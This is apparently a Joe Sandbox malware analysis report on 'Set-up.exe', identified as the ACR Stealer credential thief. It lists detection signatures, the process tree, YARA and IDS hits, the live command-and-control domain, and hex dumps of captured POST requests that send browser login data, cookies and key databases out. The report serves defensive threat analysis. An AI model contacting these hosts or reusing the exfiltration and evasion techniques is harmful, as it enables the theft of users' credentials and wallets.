Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1686587
Has dependencies:	false
MD5:	b21f13cf1a28ffc443ca52a022c78c3d
SHA1:	7704084a3977b18d2ac687eef97bb3cb27e33ff2
SHA256:	6cd56f0b601722945ffc79d0a5468784fe9b1552fdd1931a64cd0f5608a7d697
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

ACR Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected ACR Stealer

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal from password manager

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: B21F13CF1A28FFC443CA52A022C78C3D)

chrome.exe (PID: 1300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

msedge.exe (PID: 6184 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

chrome.exe (PID: 5760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

WerFault.exe (PID: 5156 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 1936 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 204 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

msedge.exe (PID: 1380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

WerFault.exe (PID: 3680 cmdline: C:\Windows\system32\WerFault.exe -u -p 1380 -s 224 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 1836 cmdline: C:\Windows\system32\WerFault.exe -u -p 1380 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

chrome.exe (PID: 2444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

WerFault.exe (PID: 2836 cmdline: C:\Windows\system32\WerFault.exe -u -p 2444 -s 152 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 2992 cmdline: C:\Windows\system32\WerFault.exe -u -p 2444 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

msedge.exe (PID: 3832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

WerFault.exe (PID: 3944 cmdline: C:\Windows\system32\WerFault.exe -u -p 3832 -s 228 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 2568 cmdline: C:\Windows\system32\WerFault.exe -u -p 3832 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

chrome.exe (PID: 4544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

WerFault.exe (PID: 5004 cmdline: C:\Windows\system32\WerFault.exe -u -p 4544 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 4848 cmdline: C:\Windows\system32\WerFault.exe -u -p 4544 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

msedge.exe (PID: 4988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

WerFault.exe (PID: 6500 cmdline: C:\Windows\system32\WerFault.exe -u -p 4988 -s 224 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 2728 cmdline: C:\Windows\system32\WerFault.exe -u -p 4988 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

elevation_service.exe (PID: 2956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7468	JoeSecurity_ACRStealer	Yara detected ACR Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7468	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Suricata Signatures

ET MALWARE ACR Stealer CnC Checkin Attempt

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-05-10T08:05:29.794242+0200	2052674	1	A Network Trojan was detected	192.168.2.5	49691	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://mcrsftuptade.pro/Up/g	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/p	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/b	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up	Avira URL Cloud: Label: malware

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 90.1%

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_02682F00 LoadLibraryA,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,CryptUnprotectData,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_02682F00

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49691 -> 188.114.96.3:80

Source: global traffic	HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
Source: global traffic	HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41649Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 51889Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 e5 a5 64 a8 00 c8 00 00 00 c8 00 00 11 00 00 00 62 2f 63 39 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 01 00 00 00 19 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 2e 6a d0 05 00 00 00 02 07 f6 00 00 00 00 18 07 fb 07 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524940Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 25259Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 a9 82 77 8d 00 60 00 00 00 60 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 0c 00 00 00 06 00 00 00 04 00 00 00 01 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 21163Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 23 6d d8 2e 00 50 00 00 00 50 00 00 0e 00 00 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 2e 6a d0 0d 0d 24 00 04 0a 0c 00 0f 67 0f cf 0a 0c 0c 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
